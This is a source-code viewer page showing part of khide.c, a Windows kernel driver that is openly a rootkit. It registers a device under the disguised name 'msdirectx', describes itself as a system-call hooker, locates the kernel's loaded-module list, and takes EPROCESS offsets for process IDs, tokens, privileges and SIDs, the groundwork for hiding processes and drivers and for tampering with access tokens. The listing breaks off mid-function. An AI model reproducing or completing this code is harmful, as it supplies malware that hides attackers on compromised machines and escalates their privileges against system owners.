📄 khide.c
字号:
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
#include "KHide.h"
#include "ProcessName.h"
#include "ioctlcmd.h"
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
// Setup our name and symbolic link.
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
// Set up the device
//
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_HKideDevice );
if(! NT_SUCCESS(ntStatus))
{
DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
if(! NT_SUCCESS(ntStatus))
{
IoDeleteDevice(DriverObject->DeviceObject);
DebugPrint("Failed to create symbolic link!\n");
return ntStatus;
}
// Create dispatch points for all routines that must be handled
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HKideDispatch;
// Its extremely unsafe to unload a system-call hooker.
// Use GREAT caution.
DriverObject->DriverUnload = HKideUnload;
// Get the offset of the process name in the EPROCESS structure.
gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
if (!gul_ProcessNameOffset)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
//dengxin
gModuleEntry = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject);
if (!gModuleEntry)
{
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
DebugPrint("Failed to create gul_PsLoadedModuleList link!\n");
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
NTSTATUS HKideUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
// Delete the symbolic link for our device
//
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
// Delete the device object
//
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
HKideDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
//
// Go ahead and set the request up as successful
//
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
irpStack = IoGetCurrentIrpStackLocation (Irp);
//
// Get the pointer to the input/output buffer and its length
//
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
if(IOCTL_TRANSFER_TYPE(ioControlCode) == METHOD_NEITHER) {
outputBuffer = Irp->UserBuffer;
}
// Its a request from rootkit
ntstatus = HKideDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
HKideDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
MODULE_ENTRY m_current;
PMODULE_ENTRY pm_current;
ANSI_STRING ansi_DriverName;
ANSI_STRING hide_DriverName;
UNICODE_STRING uni_hide_DriverName;
int i_count = 0, i_numLogs = 0, find_PID = 0;
int nluids = 0, i_PrivCount = 0, i_VariableLen = 0;
int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
int i_SidSize = 0, i_spaceNeeded = 0, i_spaceSaved = 0;
int i_spaceUsed = 0, sid_count = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
DWORD token = 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
PLUID_AND_ATTRIBUTES luids_attr = NULL;
PLUID_AND_ATTRIBUTES luids_attr_orig = NULL;
PSID_AND_ATTRIBUTES sid_ptr_old = NULL;
void *varpart = NULL, *varbegin = NULL, *psid = NULL;
DWORD SizeOfOldSids, SizeOfLastSid, d_SidStart;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
AUTHIDOFFSET = (int) (*((int *)InputBuffer+2));
TOKENOFFSET = (int) (*((int *)InputBuffer+3));
PRIVCOUNTOFFSET = (int) (*((int *)InputBuffer+4));
PRIVADDROFFSET = (int) (*((int *)InputBuffer+5));
SIDCOUNTOFFSET = (int) (*((int *)InputBuffer+6));
SIDADDROFFSET = (int) (*((int *)InputBuffer+7));
break;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -